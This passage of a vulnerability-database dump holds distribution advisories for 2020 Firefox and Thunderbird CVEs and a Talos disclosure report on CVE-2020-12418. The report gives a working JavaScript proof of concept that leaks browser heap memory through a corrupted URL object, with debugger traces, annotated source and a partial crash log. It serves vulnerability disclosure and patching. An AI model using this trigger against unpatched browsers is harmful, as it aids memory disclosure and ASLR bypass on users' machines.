"2020-07-28T04:04:14", "published": "2020-07-21T18:13:28", "id": "RHSA-2020:3038", "href": "https://access.redhat.com/errata/RHSA-2020:3038", "type": "redhat", "title": "(RHSA-2020:3038) Important: thunderbird security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2021-01-11T01:30:42", "bulletinFamily": "unix", "cvelist": ["CVE-2020-12419", "CVE-2020-12417", "CVE-2020-12418", "CVE-2020-12420", "CVE-2020-12421"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4713-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nJuly 01, 2020 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : firefox-esr\nCVE ID : CVE-2020-12417 CVE-2020-12418 CVE-2020-12419 CVE-2020-12420 \n CVE-2020-12421\n\nMultiple security issues have been found in the Mozilla Firefox\nweb browser, which could potentially result in the execution\nof arbitrary code.\n\nFor the oldstable distribution (stretch), these problems have been fixed\nin version 68.10.0esr-1~deb9u1.\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 68.10.0esr-1~deb10u1.\n\nWe recommend that you upgrade your firefox-esr packages.\n\nFor the detailed security status of firefox-esr please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/firefox-esr\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 11, "modified": "2020-07-01T18:12:37", "published": "2020-07-01T18:12:37", "id": "DEBIAN:DSA-4713-1:114C2", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2020/msg00117.html", "title": "[SECURITY] [DSA 4713-1] firefox-esr security update", "type": "debian", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-17T13:37:15", "bulletinFamily": "unix", "cvelist": ["CVE-2020-12419", "CVE-2020-12417", "CVE-2020-12418", "CVE-2020-12420", "CVE-2020-12421"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4718-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nJuly 05, 2020 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : thunderbird\nCVE ID : CVE-2020-12417 CVE-2020-12418 CVE-2020-12419\n CVE-2020-12420 CVE-2020-12421\n\nMultiple security issues have been found in Thunderbird which could\nresult in denial of service or potentially the execution of arbitrary\ncode.\n \nFor the oldstable distribution (stretch), these problems have been fixed\nin version 1:68.10.0-1~deb9u1.\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 1:68.10.0-1~deb10u1.\n\nWe recommend that you upgrade your thunderbird packages.\n\nFor the detailed security status of thunderbird please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/thunderbird\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 14, "modified": "2020-07-05T18:11:57", "published": "2020-07-05T18:11:57", "id": "DEBIAN:DSA-4718-1:20552", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2020/msg00123.html", "title": "[SECURITY] [DSA 4718-1] thunderbird security update", "type": "debian", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2020-11-10T12:37:42", "bulletinFamily": "unix", "cvelist": ["CVE-2020-12419", "CVE-2020-12417", "CVE-2020-12418", "CVE-2020-12420", "CVE-2020-12421"], "description": "**Issue Overview:**\n\nManipulating individual parts of a URL object could have caused an out-of-bounds read, leaking process memory to malicious JavaScript. This vulnerability affects Firefox ESR < 68.10, Firefox < 78, and Thunderbird < 68.10.0. ([CVE-2020-12418 __](<https://access.redhat.com/security/cve/CVE-2020-12418>))\n\nWhen processing callbacks that occurred during window flushing in the parent process, the associated window may die; causing a use-after-free condition. This could have led to memory corruption and a potentially exploitable crash. This vulnerability affects Firefox ESR < 68.10, Firefox < 78, and Thunderbird < 68.10.0. ([CVE-2020-12419 __](<https://access.redhat.com/security/cve/CVE-2020-12419>))\n\nWhen performing add-on updates, certificate chains terminating in non-built-in-roots were rejected (even if they were legitimately added by an administrator.) This could have caused add-ons to become out-of-date silently without notification to the user. This vulnerability affects Firefox ESR < 68.10, Firefox < 78, and Thunderbird < 68.10.0. ([CVE-2020-12421 __](<https://access.redhat.com/security/cve/CVE-2020-12421>))\n\nWhen trying to connect to a STUN server, a race condition could have caused a use-after-free of a pointer, leading to memory corruption and a potentially exploitable crash. This vulnerability affects Firefox ESR < 68.10, Firefox < 78, and Thunderbird < 68.10.0. ([CVE-2020-12420 __](<https://access.redhat.com/security/cve/CVE-2020-12420>))\n\nDue to confusion about ValueTags on JavaScript Objects, an object may pass through the type barrier, resulting in memory corruption and a potentially exploitable crash. *Note: this issue only affects Firefox on ARM64 platforms.* This vulnerability affects Firefox ESR < 68.10, Firefox < 78, and Thunderbird < 68.10.0. ([CVE-2020-12417 __](<https://access.redhat.com/security/cve/CVE-2020-12417>))\n\n \n**Affected Packages:** \n\n\nthunderbird\n\n \n**Issue Correction:** \nRun _yum update thunderbird_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n src: \n thunderbird-68.9.0-1.amzn2.src \n \n x86_64: \n thunderbird-68.9.0-1.amzn2.x86_64 \n thunderbird-debuginfo-68.9.0-1.amzn2.x86_64 \n \n \n", "edition": 1, "modified": "2020-07-21T16:34:00", "published": "2020-07-21T16:34:00", "id": "ALAS2-2020-1468", "href": "https://alas.aws.amazon.com/AL2/ALAS-2020-1468.html", "title": "Important: thunderbird", "type": "amazon", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2020-07-18T01:25:41", "bulletinFamily": "unix", "cvelist": ["CVE-2020-12419", "CVE-2020-12417", "CVE-2020-12418", "CVE-2020-12420", "CVE-2020-12421"], "description": "This update for MozillaThunderbird to version 68.10.0 ESR fixes the\n following issues:\n\n - CVE-2020-12417: Memory corruption due to missing sign-extension for\n ValueTags on ARM64 (bsc#1173576).\n - CVE-2020-12418: Information disclosure due to manipulated URL object\n (bsc#1173576).\n - CVE-2020-12419: Use-after-free in nsGlobalWindowInner (bsc#1173576).\n - CVE-2020-12420: Use-After-Free when trying to connect to a STUN server\n (bsc#1173576).\n - CVE-2020-12421: Add-On updates did not respect the same certificate\n trust rules as software updates (bsc#1173576).\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n", "edition": 1, "modified": "2020-07-18T00:14:02", "published": "2020-07-18T00:14:02", "id": "OPENSUSE-SU-2020:0982-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00026.html", "title": "Security update for MozillaThunderbird (important)", "type": "suse", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-15T21:25:29", "bulletinFamily": "unix", "cvelist": ["CVE-2020-12419", "CVE-2020-12417", "CVE-2020-12418", "CVE-2020-12420", "CVE-2020-12421"], "description": "This update for MozillaThunderbird to version 68.10.0 ESR fixes the\n following issues:\n\n - CVE-2020-12417: Memory corruption due to missing sign-extension for\n ValueTags on ARM64 (bsc#1173576).\n - CVE-2020-12418: Information disclosure due to manipulated URL object\n (bsc#1173576).\n - CVE-2020-12419: Use-after-free in nsGlobalWindowInner (bsc#1173576).\n - CVE-2020-12420: Use-After-Free when trying to connect to a STUN server\n (bsc#1173576).\n - CVE-2020-12421: Add-On updates did not respect the same certificate\n trust rules as software updates (bsc#1173576).\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n", "edition": 1, "modified": "2020-07-15T18:21:06", "published": "2020-07-15T18:21:06", "id": "OPENSUSE-SU-2020:0967-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00023.html", "title": "Security update for MozillaThunderbird (important)", "type": "suse", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-20T17:25:56", "bulletinFamily": "unix", "cvelist": ["CVE-2020-12419", "CVE-2020-12423", "CVE-2020-12424", "CVE-2020-12402", "CVE-2020-12417", "CVE-2020-12415", "CVE-2020-12418", "CVE-2020-12426", "CVE-2020-12425", "CVE-2020-12416", "CVE-2020-12420", "CVE-2020-12422", "CVE-2020-12421"], "description": "This update for MozillaFirefox to version 78.0.1 ESR fixes the following\n issues:\n\n Security issues fixed:\n\n - CVE-2020-12415: AppCache manifest poisoning due to url encoded character\n processing (bsc#1173576).\n - CVE-2020-12416: Use-after-free in WebRTC VideoBroadcaster (bsc#1173576).\n - CVE-2020-12417: Memory corruption due to missing sign-extension for\n ValueTags on ARM64 (bsc#1173576).\n - CVE-2020-12418: Information disclosure due to manipulated URL object\n (bsc#1173576).\n - CVE-2020-12419: Use-after-free in nsGlobalWindowInner (bsc#1173576).\n - CVE-2020-12420: Use-After-Free when trying to connect to a STUN server\n (bsc#1173576).\n - CVE-2020-12402: RSA Key Generation vulnerable to side-channel attack\n (bsc#1173576).\n - CVE-2020-12421: Add-On updates did not respect the same certificate\n trust rules as software updates (bsc#1173576).\n - CVE-2020-12422: Integer overflow in nsJPEGEncoder::emptyOutputBuffer\n (bsc#1173576).\n - CVE-2020-12423: DLL Hijacking due to searching %PATH% for a library\n (bsc#1173576).\n - CVE-2020-12424: WebRTC permission prompt could have been bypassed by a\n compromised content process (bsc#1173576).\n - CVE-2020-12425: Out of bound read in Date.parse() (bsc#1173576).\n - CVE-2020-12426: Memory safety bugs fixed in Firefox 78 (bsc#1173576).\n - FIPS: MozillaFirefox: allow /proc/sys/crypto/fips_enabled (bsc#1167231).\n\n Non-security issues fixed:\n\n - Fixed interaction with freetype6 (bsc#1173613).\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n", "edition": 1, "modified": "2020-07-20T15:12:56", "published": "2020-07-20T15:12:56", "id": "OPENSUSE-SU-2020:1017-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00049.html", "title": "Security update for MozillaFirefox (important)", "type": "suse", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-18T01:25:40", "bulletinFamily": "unix", "cvelist": ["CVE-2020-12419", "CVE-2020-12423", "CVE-2020-12424", "CVE-2020-12402", "CVE-2020-12417", "CVE-2020-12415", "CVE-2020-12418", "CVE-2020-12426", "CVE-2020-12425", "CVE-2020-12416", "CVE-2020-12420", "CVE-2020-12422", "CVE-2020-12421"], "description": "This update for MozillaFirefox to version 78.0.1 ESR fixes the following\n issues:\n\n Security issues fixed:\n\n - CVE-2020-12415: AppCache manifest poisoning due to url encoded character\n processing (bsc#1173576).\n - CVE-2020-12416: Use-after-free in WebRTC VideoBroadcaster (bsc#1173576).\n - CVE-2020-12417: Memory corruption due to missing sign-extension for\n ValueTags on ARM64 (bsc#1173576).\n - CVE-2020-12418: Information disclosure due to manipulated URL object\n (bsc#1173576).\n - CVE-2020-12419: Use-after-free in nsGlobalWindowInner (bsc#1173576).\n - CVE-2020-12420: Use-After-Free when trying to connect to a STUN server\n (bsc#1173576).\n - CVE-2020-12402: RSA Key Generation vulnerable to side-channel attack\n (bsc#1173576).\n - CVE-2020-12421: Add-On updates did not respect the same certificate\n trust rules as software updates (bsc#1173576).\n - CVE-2020-12422: Integer overflow in nsJPEGEncoder::emptyOutputBuffer\n (bsc#1173576).\n - CVE-2020-12423: DLL Hijacking due to searching %PATH% for a library\n (bsc#1173576).\n - CVE-2020-12424: WebRTC permission prompt could have been bypassed by a\n compromised content process (bsc#1173576).\n - CVE-2020-12425: Out of bound read in Date.parse() (bsc#1173576).\n - CVE-2020-12426: Memory safety bugs fixed in Firefox 78 (bsc#1173576).\n - FIPS: MozillaFirefox: allow /proc/sys/crypto/fips_enabled (bsc#1167231).\n\n Non-security issues fixed:\n\n - Fixed interaction with freetype6 (bsc#1173613).\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n", "edition": 1, "modified": "2020-07-18T00:14:49", "published": "2020-07-18T00:14:49", "id": "OPENSUSE-SU-2020:0983-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00027.html", "title": "Security update for MozillaFirefox (important)", "type": "suse", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2020-07-27T03:27:02", "bulletinFamily": "unix", "cvelist": ["CVE-2020-12419", "CVE-2020-12417", "CVE-2020-12418", "CVE-2020-12420", "CVE-2020-12421"], "description": "### Background\n\nMozilla Thunderbird is a popular open-source email client from the Mozilla project. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Mozilla Thunderbird. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nPlease review the referenced CVE identifiers for details.\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Mozilla Thunderbird users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=mail-client/thunderbird-68.10.0\"\n \n\nAll Mozilla Thunderbird binary users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=mail-client/thunderbird-bin-68.10.0\"", "edition": 1, "modified": "2020-07-26T00:00:00", "published": "2020-07-26T00:00:00", "id": "GLSA-202007-09", "href": "https://security.gentoo.org/glsa/202007-09", "title": "Mozilla Thunderbird: Multiple vulnerabilities", "type": "gentoo", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-27T03:26:58", "bulletinFamily": "unix", "cvelist": ["CVE-2020-12419", "CVE-2020-12424", "CVE-2020-12402", "CVE-2020-12417", "CVE-2020-12415", "CVE-2020-12418", "CVE-2020-12426", "CVE-2020-12425", "CVE-2020-12416", "CVE-2020-12420", "CVE-2020-12422", "CVE-2020-12421"], "description": "### Background\n\nMozilla Firefox is a popular open-source web browser from the Mozilla Project. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Mozilla Firefox. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nPlease review the referenced CVE identifiers for details.\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Mozilla Firefox users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-client/firefox-68.10.0\"\n \n\nAll Mozilla Firefox binary users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-client/firefox-bin-68.10.0\"", "edition": 1, "modified": "2020-07-26T00:00:00", "published": "2020-07-26T00:00:00", "id": "GLSA-202007-10", "href": "https://security.gentoo.org/glsa/202007-10", "title": "Mozilla Firefox: Multiple vulnerabilities", "type": "gentoo", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2020-09-02T11:42:07", "bulletinFamily": "info", "cvelist": ["CVE-2020-12419", "CVE-2020-12417", "CVE-2020-15646", "CVE-2020-12418", "CVE-2020-12420", "CVE-2020-12421"], "description": "### *Detect date*:\n06/30/2020\n\n### *Severity*:\nWarning\n\n### *Description*:\nMultiple vulnerabilities were found in Mozilla Thunderbird. Malicious users can exploit these vulnerabilities to cause denial of service, bypass security restrictions, obtain sensitive information.\n\n### *Affected products*:\nMozilla Thunderbird earlier than 68.10.0\n\n### *Solution*:\nUpdate to the latest version \n[Download Thunderbird](<https://www.mozilla.org/en-US/thunderbird/>)\n\n### *Original advisories*:\n[MFSA2020-26](<https://www.mozilla.org/en-US/security/advisories/mfsa2020-26/>) \n\n\n### *Impacts*:\nOSI \n\n### *Related products*:\n[Mozilla Thunderbird](<https://threats.kaspersky.com/en/product/Mozilla-Thunderbird/>)\n\n### *CVE-IDS*:\n[CVE-2020-12417](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12417>)0.0Unknown \n[CVE-2020-12421](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12421>)0.0Unknown \n[CVE-2020-12420](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12420>)0.0Unknown \n[CVE-2020-12418](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12418>)0.0Unknown \n[CVE-2020-12419](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12419>)0.0Unknown \n[CVE-2020-15646](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15646>)0.0Unknown", "edition": 1, "modified": "2020-07-22T00:00:00", "published": "2020-06-30T00:00:00", "id": "KLA11829", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11829", "title": "\r KLA11829Multiple vulnerabilities in Mozilla Thunderbird ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-15T12:23:54", "bulletinFamily": "unix", "cvelist": ["CVE-2020-12419", "CVE-2020-12406", "CVE-2020-12398", "CVE-2020-12417", "CVE-2020-12418", "CVE-2020-12410", "CVE-2020-12405", "CVE-2020-12420", "CVE-2020-12399", "CVE-2020-12421"], "description": "Multiple security issues were discovered in Thunderbird. If a user were \ntricked in to opening a specially crafted website in a browsing context, \nan attacker could potentially exploit these to cause a denial of service, \nobtain sensitive information, or execute arbtirary code. (CVE-2020-12405, \nCVE-2020-12406, CVE-2020-12410, CVE-2020-12417, CVE-2020-12418, \nCVE-2020-12419, CVE-2020-12420)\n\nIt was discovered that Thunderbird would continue an unencrypted \nconnection when configured to use STARTTLS for IMAP if the server \nresponded with PREAUTH. A remote attacker could potentially exploit \nthis to perform a person-in-the-middle attack in order to obtain \nsensitive information. (CVE-2020-12398)\n\nIt was discovered that NSS showed timing differences when performing DSA \nsignatures. An attacker could potentially exploit this to obtain private \nkeys using a timing attack. (CVE-2020-12399)\n\nIt was discovered that when performing add-on updates, certificate chains \nnot terminating with built-in roots were silently rejected. This could \nresult in add-ons becoming outdated. (CVE-2020-12421)", "edition": 2, "modified": "2020-07-08T00:00:00", "published": "2020-07-08T00:00:00", "id": "USN-4421-1", "href": "https://ubuntu.com/security/notices/USN-4421-1", "title": "Thunderbird vulnerabilities", "type": "ubuntu", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-15T12:32:31", "bulletinFamily": "unix", "cvelist": ["CVE-2020-12419", "CVE-2020-12424", "CVE-2020-12417", "CVE-2020-12415", "CVE-2020-12418", "CVE-2020-12426", "CVE-2020-12425", "CVE-2020-12416", "CVE-2020-12420", "CVE-2020-12422", "CVE-2020-12421"], "description": "Multiple security issues were discovered in Firefox. If a user were \ntricked in to opening a specially crafted website, an attacker could \npotentially exploit these to cause a denial of service, obtain sensitive \ninformation, bypass permission prompts, or execute arbitrary code. \n(CVE-2020-12415, CVE-2020-12416, CVE-2020-12417, CVE-2020-12418, \nCVE-2020-12419, CVE-2020-12420, CVE-2020-12422, CVE-2020-12424, \nCVE-2020-12425, CVE-2020-12426)\n\nIt was discovered that when performing add-on updates, certificate chains \nnot terminating with built-in roots were silently rejected. This could \nresult in add-ons becoming outdated. (CVE-2020-12421)", "edition": 2, "modified": "2020-07-02T00:00:00", "published": "2020-07-02T00:00:00", "id": "USN-4408-1", "href": "https://ubuntu.com/security/notices/USN-4408-1", "title": "Firefox vulnerabilities", "type": "ubuntu", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "talos": [{"lastseen": "2020-11-12T23:29:30", "bulletinFamily": "info", "cvelist": ["CVE-2020-12418"], "description": "# Talos Vulnerability Report\n\n### TALOS-2020-1088\n\n## Mozilla Firefox URL mPath Information Disclosure Vulnerability\n\n##### July 1, 2020\n\n##### CVE Number\n\nCVE-2020-12418\n\n### Summary\n\nAn information disclosure vulnerability exists in the URL mPath functionality of Mozilla Firefox Firefox Nightly Version 78.0a1 x64 and Firefox Release Version 76.0.2 x64. A specially crafted URL object can cause an out-of-bounds read. An attacker can visit a webpage to trigger this vulnerability.\n\n### Tested Versions\n\nMozilla Firefox Firefox Nightly Version 78.0a1 x64 \nMozilla Firefox Firefox Release Version 76.0.2 x64\n\n### Product URLs\n\n<https://www.mozilla.org/en-US/firefox/new>\n\n### CVSSv3 Score\n\n6.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N\n\n### CWE\n\nCWE-125 - Out-of-bounds Read\n\n### Details\n\nMozilla Firefox is one of the most popular web browsers on the world available for a variety of the different platforms : Windows, Linux, OSX, Android and more. Its active development ensure support for the newest web technologies like HTML5 or CSS3.\n\nThe vulnerability is related with the `URL` object. A malicious web page using a proper `URL` object state can leak the browser memory that consequently can help an attacker in bypassing ASLR and executing arbitrary code. JavaScript code settings proper state in `URL` object which will lead to memory leak, looks in the following way :\n \n \n Line 1 urlObject = new URL(\"http://www.cisco.com\");\n Line 2 \n Line 3 //alloc leakSize\n Line 4 leakSize = 1330; \n Line 5 \n Line 6 urlObject.search = \"A\".repeat(10); \n Line 7 urlObject.host = \"B\".repeat(leakSize); \n Line 8 \n Line 9 //set mPath.mLen < 0 \n Line 10 urlObject.pathname = \"\"; \n Line 11 urlObject.search = \"X\"; \n Line 12 urlObject.host = \"Y\";\n Line 13 \n Line 14 //trigger - copy(...,...,leakSize)\n Line 15 urlObject.search = \"C\".repeat(20); \n \n\nTo better understand what is happening with an internal state of the `urlObject` and especially with `mPath` field, an execution of an \u201cinstrumented\u201d version of the above code is shown below:\n \n \n Line 1 \t\turlObject = new URL(\"http://www.cisco.com\");\n Line 2 \t\thttp://www.cisco.com/\n Line 3 \t\tmPath pos : 0x14 len : 0x1\n Line 4 \t\n Line 5 \t\turlObject.search = \"A\".repeat(10);\n Line 6 \t\t$2 = \"mozilla::net::nsStandardURL::SetQueryWithEncoding\"\n Line 7 \t\thttp://www.cisco.com/?AAAAAAAAAA\n Line 8 \t\tmPath pos : 0x14 len : 0xc\n Line 9 \t\n Line 10\t\turlObject.host = \"B\".repeat(50);\n Line 11\t\t$3 = \"mozilla::net::nsStandardURL::SetHostPort\"\n Line 12\t\thttp://bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb/?AAAAAAAAAA\n Line 13\t\tmPath pos : 0x39 len : 0xc\n Line 14\t\n Line 17\t\n Line 18\t\turlObject.pathname = \"\"; \n Line 19\t\t$4 = \"mozilla::net::nsStandardURL::SetFilePath\"\n Line 20\t\thttp://bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb/?AAAAAAAAAA\n Line 21\t\tmPath pos : 0x39 len : 0x1\n Line 22\t\n Line 23\t\turlObject.search = \"X\";\n Line 24\t\t$5 = \"mozilla::net::nsStandardURL::SetQueryWithEncoding\"\n Line 25\t\thttp://bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb/?X\n Line 26\t\tmPath pos : 0x39 len : 0xfffffff8\n Line 27\t\n Line 28\t\turlObject.host = \"Y\";\n Line 29\t\t$6 = \"mozilla::net::nsStandardURL::SetHostPort\"\n Line 30\t\thttp://y/?X\n Line 31\t\tmPath pos : 0x39 len : 0xfffffff8\n Line 32\t\n Line 33\t\turlObject.search = \"C\".repeat(20);\n Line 34\t\t$7 = \"mozilla::net::nsStandardURL::SetQueryWithEncoding\"\n \n\nBefore we will continue with our analysis let\u2019s remember the syntax of a URL as defined by the standard :\n \n \n [scheme://][username[:password]@]host[:port]/path[?query_string][#ref]\t\n \n\nAlso a visualization of the `urlObject` can help to understand its\u2019 further state. The following visualization represents `urlObject` after execution of code at `line 10`.\n \n \n mPos.mLen\n +--------------+\n | |\n +----------------------------------------------------+\n | | |\n | http://bbb(...) | /?AAAAAAAAAA |\n | | |\n +----------------------------------------------------+\n ^\n |\n |\n +\n mPath.mPos \n \n Figure 1. \n \n\nwhere the `mPath.mPos = 0x39` and `mPath.mLen = 0xC`. Next , code executed at `line 18` changes the value of `mPath.mLen` to 1. `mPos` field is untouched. The situation becomes more interesting when we execute code at `line 23` after which the `mPath.mLen` field value is equal to `-8 [0xfffffff8]`. Let\u2019s take a look at how that happened. To understand this we need to dive into method responsible of setting `search` field in `URL` object , which is `SetQueryWithEncoding`:\n \n \n \t\t\tnetwerk/base/nsStandardURL.cpp\n \n \t\t\tnsresult nsStandardURL::SetQueryWithEncoding(const nsACString& input,\n \t\t\t\t\t\t\t\t\t\t\t\t\t\t const Encoding* encoding) {\n \t\t\t const nsPromiseFlatCString& flat = PromiseFlatCString(input);\n \t\t\t const char* query = flat.get();\n \t\t\t \n \t\t\t (...)\n \t \n Line 2789\t int32_t shift = ReplaceSegment(mQuery.mPos, mQuery.mLen, query, queryLen);\n Line 2790\n Line 2791\t if (shift) {\n Line 2792\t\tmQuery.mLen = queryLen;\n Line 2793\t\tmPath.mLen += shift;\n Line 2794\t\tShiftFromRef(shift);\n Line 2795\t }\n Line 2796\t return NS_OK;\n Line 2797\t} \n \n\nAt `line 2789` the difference between the length of the current query string and one we want to set is calculated. After the calculation of the `shift` variable, it has the value `-9` because `len(\"X\") - len(\"A\"*10)`. Everything would be ok and the space dedicated for a query string would shrink from 10 to 1, but using the code:\n \n \n Line 18\t\turlObject.pathname = \"\"; \n \n\nwe change `mPath.mLen` value to `1`, which now after adding `shift` variable at `line 2793` equals `0xfffffff8`. `mPath.mLen` field value being below zero will have significant consequences for further code behavior.\n\nExecuting code:\n \n \n Line 28\t\turlObject.host = \"Y\";\n \n\nwe change the host part of the url which should also change the `mPath.mPos` field , but that did not happen:\n \n \n Line 31\t\tmPath pos : 0x39 len : 0xfffffff8\n \n\nLet\u2019s take a glance into the `host` setter `SetHost` method to see why that situation occurred:\n \n \n \t\t\tnetwerk/base/nsStandardURL.cpp\n \t\t\tnsresult nsStandardURL::SetHost(const nsACString& input) {\n \t\t\t const nsPromiseFlatCString& hostname = PromiseFlatCString(input);\n \t\t\t \n \t\t\t (...)\n \t \n Line 1979 int32_t shift = ReplaceSegment(mHost.mPos, mHost.mLen, host, len);\n Line 1980\n Line 1981 if (shift) {\n Line 1982 mHost.mLen = len;\n Line 1983 mAuthority.mLen += shift;\n Line 1984 ShiftFromPath(shift);\n Line 1985 }\n \n\nAgain the difference between the current `host` string and the one being set is calculated. The shift operation which should change `mPath.mPos` value takes place inside `ShiftFromPath`:\n \n \n \t\t\tnetwerk/base/nsStandardURL.cpp\n \n Line 1146\t#define SHIFT_FROM(name, what) \\\n Line 1147\t void nsStandardURL::name(int32_t diff) { \\\n Line 1148\t\tif (!diff) return; \\\n Line 1149\t\tif (what.mLen >= 0) { \\\n Line 1150\t\t CheckedInt<int32_t> pos = what.mPos; \\\n Line 1151\t\t pos += diff; \\\n Line 1152\t\t MOZ_ASSERT(pos.isValid()); \\\n Line 1153\t\t what.mPos = pos.value(); \\\n Line 1154\t\t}\n Line 1155\n Line 1156\t#define SHIFT_FROM_NEXT(name, what, next) \\\n Line 1157\t SHIFT_FROM(name, what) \\\n Line 1158\t next(diff); \\\n Line 1159\t }\n Line 1160\n Line 1161\t#define SHIFT_FROM_LAST(name, what) \\\n Line 1162\t SHIFT_FROM(name, what) \\\n Line 1163\t }\n Line 1164\n Line \n Line 1169\tSHIFT_FROM_NEXT(ShiftFromPath, mPath, ShiftFromFilepath)\n \n\nAt `line 1153` we see code which should update `mPos` field but that wont happen because our `mLen` field value is -8 what does not pass constraint at `line 1149`. As a result, the memory layout of our `urlObject` currently looks like this:\n \n \n +-----------------+-------------------------------------------------+\n | | |\n | http://y/?X | RANDOM_MEMORY |\n | | |\n +-----------------+-------------------------------------------------+\n ^\n |\n |\n +\n mPath.mPos\n \n Figure 2.\n \n\nAs we can see `mPath.mPos` points clearly outside the memory occupied by the URL string and no longer points to the place where the `url path` starts. In this situation, execution of the next line :\n \n \n Line 33\t\turlObject.search = \"C\".repeat(20);\n \n\ncauses a leak of memory. We find the answer inside `search` field setter handler:\n \n \n \tnetwerk/base/nsStandardURL.cpp\n \tnsresult nsStandardURL::SetQueryWithEncoding(const nsACString& input, const Encoding* encoding) {\t\t\t\t\t\t\t\t\t\t\t\t\t \n \t\t\t(...)\n Line 2737 \t\tif (mPath.mLen < 0) return SetPathQueryRef(flat);\t\t\n \n\nWe pass the constraint at `line 2737` and `SetPathQueryRef` is executed:\n \n \n \t\t\tnetwerk/base/nsStandardURL.cpp\n \t\t\tnsresult nsStandardURL::SetPathQueryRef(const nsACString& input) {\n \t\t\n Line 2064\tif (!path.IsEmpty()) {\n Line 2065\tnsAutoCString spec;\n Line 2066\n Line 2067\tspec.Assign(mSpec.get(), mPath.mPos);\n Line 2068\tif (path.First() != '/') spec.Append('/');\n Line 2069\tspec.Append(path);\n Line 2070\n Line 2071\treturn SetSpecInternal(spec);\n Line 2072\t}\t\t\n \n\nHere, a new string object with the URL string is created at `line 2065`. First, the old URL string is copied from the beginning to the place pointed by `mPath.mPos` at `line 2067`. Now we clearly see place where the random memory will be leaked, because as shown in Figure 2. `mPos` points way behind the real end of an url string end.\n\nThe leaked memory presented by code above can be used to bypass ASLR and with a combination with other vulnerability might allow an attacker to gain arbitrary code execution.\n\n### Crash Information\n \n \n ==61400==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60300046b9c0 at pc 0x55a402c80f6a bp 0x7ffcb6d32410 sp 0x7ffcb6d31bd8\n READ of size 1337 at 0x60300046b9c0 thread T0 (file:// Content)\n \t#0 0x55a402c80f69 